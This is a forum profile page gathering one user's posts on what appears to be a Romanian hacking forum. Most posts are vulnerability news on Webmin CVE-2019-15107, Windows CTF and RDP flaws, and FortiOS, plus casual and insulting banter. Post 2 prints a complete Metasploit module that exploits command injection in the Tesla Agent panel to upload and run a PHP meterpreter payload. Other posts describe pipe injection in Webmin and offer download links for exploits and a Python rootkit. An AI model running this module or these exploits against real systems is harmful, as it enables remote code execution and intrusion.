Jump to content

BiosHell

Active Members
  • Content Count

    326
  • Joined

  • Last visited

  • Days Won

    17

Everything posted by BiosHell

  1. Today’s exploit of the day is one affecting the popular system administrator tool Webmin that is know to run on port 10000. A bug has been found in the reset password function that allows a malicious third party to execute malicious code due to lack of input validation. Affecting: Webmin up to the latest version 1.920 instances which has the setting “user password change enabled” The vulnerability has been given the CVE CVE-2019-15107 as the time of writing this(2019-08-16) the vulnerability still exists in the latest version you can download from webmin’s official site. Vulnerable code in version 1.920 computer@box:/tmp/webmin-1.920$ cat -n password_change.cgi | head -n 176 | tail -29 148 149 # Read shadow file and find user 150 &lock_file($miniserv{'passwd_file'}); 151 $lref = &read_file_lines($miniserv{'passwd_file'}); 152 for($i=0; $i<@$lref; $i++) { 153 @line = split(/:/, $lref->[$i], -1); 154 local $u = $line[$miniserv{'passwd_uindex'}]; 155 if ($u eq $in{'user'}) { 156 $idx = $i; 157 last; 158 } 159 } 160 defined($idx) || &pass_error($text{'password_euser'}); 161 162 # Validate old password 163 &unix_crypt($in{'old'}, $line[$miniserv{'passwd_pindex'}]) eq 164 $line[$miniserv{'passwd_pindex'}] || 165 &pass_error($text{'password_eold'}); 166 167 # Make sure new password meets restrictions 168 if (&foreign_check("changepass")) { 169 &foreign_require("changepass", "changepass-lib.pl"); 170 $err = &changepass::check_password($in{'new1'}, $in{'user'}); 171 &pass_error($err) if ($err); 172 } 173 elsif (&foreign_check("useradmin")) { 174 &foreign_require("useradmin", "user-lib.pl"); 175 $err = &useradmin::check_password_restrictions( 176 $in{'new1'}, $in{'user'}); Proof of concept The vulnerability laws in the &unix_crypt crypt function that checks the passwd against the systems /etc/shadow file By adding a simple pipe command (“|”) the author is able to exploit this to execute what ever code he wants. The pipe command is like saying and in the context of “execute this command and this” here does the author prove that this is exploitable very easy with just a simple POST request. Webmin has not had a public statement or patch being announced yet meaning everyone who is running webmin is running a vulnerable version and should take it offline until further notice. It is still very unclear on how many public instances of webmin are public on the internet a quick search on shodan finds a bit over 13 0000. External links: Webmin on wikipedia Webmin in nmap Authors blog post Archived link of the authors blog post Nist CVE Shodan Stay up to date with Vulnerability Management and build cool things with our API This blog post is part of the exploit of the day series where we write a shorter description about interesting exploits that we index. Reference Link : https://blog.firosolutions.com/exploits/webmin/?fbclid=IwAR06hKE7owE6af5dXmBaN-o5wioKPeY609QQkXaRwEHRxBMfoCUDaNHq7FY Download Link :https://www.exploit-db.com/exploits/47230 Download Link 2 .: https://www.exploit-db.com/exploits/47293
  2. class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Tesla Agent Remote Code Execution", 'Description' => %q{ This module exploits the command injection vulnerability of tesla agent botnet panel. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module ], 'References' => [ ['URL', 'https://prodaft.com'] ], 'DefaultOptions' => { 'SSL' => false, 'WfsDelay' => 5, }, 'Platform' => ['php'], 'Arch' => [ ARCH_PHP ], 'Targets' => [ ['PHP payload', { 'Platform' => 'PHP', 'Arch' => ARCH_PHP, 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} } ] ], 'Privileged' => false, 'DisclosureDate' => "July 10 2018", 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']), ] ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'), ) #print_status(res.body) if res && res.body.include?('SQLSTATE') Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit check name = '.'+Rex::Text.rand_text_alpha(4)+'.php' res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'/server_side/scripts/server_processing.php'), 'encode_params' => true, 'vars_get' => { 'table' => 'passwords', 'primary' => 'password_id', 'clmns' => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}', 'where' => Rex::Text.encode_base64("1=1 UNION SELECT \"echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{name}\"") } ) if res && res.code == 200 && res.body.include?('recordsTotal') print_good("Payload uploaded as #{name}") else print_error('Payload upload failed :(') Msf::Exploit::Failed end res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'/server_side/scripts/',name)}, 5 ) if res && res.code == 200 print_good("Payload successfully triggered !") else print_error('Payload trigger failed :(') Msf::Exploit::Failed end end end Download Link https://www.exploit-db.com/exploits/47256
  3. BiosHell

    butthax

    the real "penetration testing"
  4. BiosHell

    Fun stuff

    https://i.imgur.com/FmDymVR.jpg
  5. BiosHell

    buna ziua

    Daca nu se mai inscriu retardati aici moare complet forumul
  6. A Google security researcher has just disclosed details of a 20-year-old unpatched high-severity vulnerability affecting all versions of Microsoft Windows, back from Windows XP to the latest Windows 10. The vulnerability resides in the way MSCTF clients and server communicate with each other, allowing even a low privileged or a sandboxed application to read and write data to a higher privileged application. MSCTF is a module in Text Services Framework (TSF) of the Windows operating system that manages things like input methods, keyboard layouts, text processing, and speech recognition. In a nutshell, when you log in to your Windows machine, it starts a CTF monitor service that works as a central authority to handle communications between all clients, which are actually windows for each process running on the same session. POC Link : https://github.com/taviso/ctftool Reference Link : https://thehackernews.com/2019/08/ctfmon-windows-vulnerabilities.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&utm_content=FaceBook&fbclid=IwAR2P3wJ-iWLStzuyUoAnsIWVDojE7P-kyUJnnrX0tnOAN-c1DU7KGbDAGGM
  7. Esti si bou si nici nu esti in stare sa cauti in google, ceea ce este un beneficiu pentru cei ca tine. Maine apare postare...caut scan de vps...sau vps de scan Cum ti-au sugerat baietii si mai sus...pune mana si citeste o carte
  8. Discovered by Microsoft's security team itself, all four vulnerabilities, CVE-2019-1181, CVE-2019-1182, CVE-2019-1222, and CVE-2019-1226, can be exploited by unauthenticated, remote attackers to take control of an affected computer system without requiring any user interaction. Just like BlueKeep RDP flaw, all four newly discovered vulnerabilities are also wormable and could be exploited by potential malware to propagate itself from one vulnerable computer to another automatically. Reference Link : https://thehackernews.com/2019/08/windows-rdp-wormable-flaws.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&utm_content=FaceBook&fbclid=IwAR0gMT730nUergbtGRe7cdnTMT4KFVGAfc9hrxwr5oiRSTen8Vi3Amxm84I
  9. The below versions of FortiOS were vulnerable. FortiOS 5.6.3 to 5.6.7 FortiOS 6.0.0 to 6.0.4 ONLY if the SSL VPN service (web-mode or tunnel-mode) is enabled. Download Link: https://github.com/milo2012/CVE-2018-13379?fbclid=IwAR3KlBz15aRQkNYGSHVproriKQPXBFB9fBPnSjkMurySlbnSvvqBB1dV7pI
  10. SpaceCow - Python Rootkit Follow me on Twitter In the past days i spent a lot of time watching some RedTeam ops and I saw all these little tools making some awsome stuff... and in the 90% of the cases RedTeams don't share their tricks and softwares with others. So i thought I could create something open source. And after some days i crawled up with something... Acest script este doar pentru testing. Esti complet responsabil pentru ceea ce faci Download Link : https://github.com/TheSph1nx/SpaceCow?fbclid=IwAR0jCSepxcqcCNKv4gvhoxnVANO3YqndmuhX006-VKw1tunk2BINnF1DJQw
  11. e un poc pt dos ala pe care il stii tu asa vechi... aici este vorba de RCE
  12. Check Point Software Technologies issued a report today that detailed how its security researchers were able to remotely install malware on a digital DSLR camera. Ransomware has become a major threat to computer systems in recent years, as high-profile attacks have locked users out of personal computers, hospitals, city governments, and even The Weather Channel. Now, security researchers have discovered that another device that might be at risk: a DSLR camera. Check Point Software Technologies issued a report today that detailed how its security researchers were able to remotely install malware on a digital DSLR camera. In it, researcher Eyal Itkin found that a hacker can easily plant malware on a digital camera. He says that the standardized Picture Transfer Protocol is an ideal method for delivering malware: it’s unauthenticated and can be used with both Wi-Fi and USB. The report notes that individual with an infected Wi-Fi access point could deploy it at a tourist destination to pull off an attack, or infect a user’s PC. Reference Link : https://www.blackhatethicalhacking.com/dslr-cameras-vulnerable-to-ransomware-attack/
  13. Download Link : https://ufile.io/3f6m4lwf Available for 30 days !
  14. i see what you did there
  15. How To Scan Vulnerabilities With Nmap NSE? Nmap is a very popular and powerful network-scanning tool. Used by all the hackers, script kiddies, pentesters, security researchers... on this world. Nmap is compatible with Windows, BSD, Mac OS X, Linux. Scan vulnerabilities with vulscan vulscan is a Nmap's module which enhances Nmap to a vulnerability scanner. The nmap option -sV enables version detection per service which is used to determine potential flaws according to the identified product. The data is looked up in an offline version of VulDB. Scan vulnerabilities with nmap-vulners nmap-vulners is a NSE script using vulnerabilities database from Vulners.com to detect vulnerabilities on target. Reference Link : https://githacktools.blogspot.com/2019/08/how-to-scan-vulnerabilities-with-nmap-nse.html?fbclid=IwAR1VFZn5MOmZGS0kcNUBU1-VkXK0IfRsPbeDIwQYKsXt91xbyTr-LHj0IXk
  16. PDF Link : https://github.com/blackorbird/APT_REPORT/blob/master/exploit_report/%23bluekeep RDP from patch to remote code execution.pdf
  17. Security Tool Chest Anticipating and mitigating security threats is critical during software development. This paper is going to detail and investigate security vulnerabilities and mitigation strategies to help software developers build secure applications and prevent operating system leaks. This paper examines common vulnerabilities, and provides relevant mitigation strategies, from several relevant perspectives. This paper hopes to encompasses the cyber Kill chain as part of the five stage compramision stages, displaying relevant tools, books and strategies at each stage. Contents Reconnaissance Weaponization Delivery Command and Control Lateral Movement Establish Foothold Escalate Privileges Data Exfiltration DLL Architecture References Reference Link : https://github.com/jmscory/Security-Tool-Chest/blob/master/README.md#reconnaissance
  18. Eu stiam ca avem deja o sectiune pentru voi : "Cosul de gunoi"
  19. Si eu sunt curios sa vad cum o sa se comporte, si cu ce bugs mai iese , imi e greu sa cred ca se vor reface asa rapid din dauna,dar inca imi mentin starea de pozitivitate
×
×
  • Create New...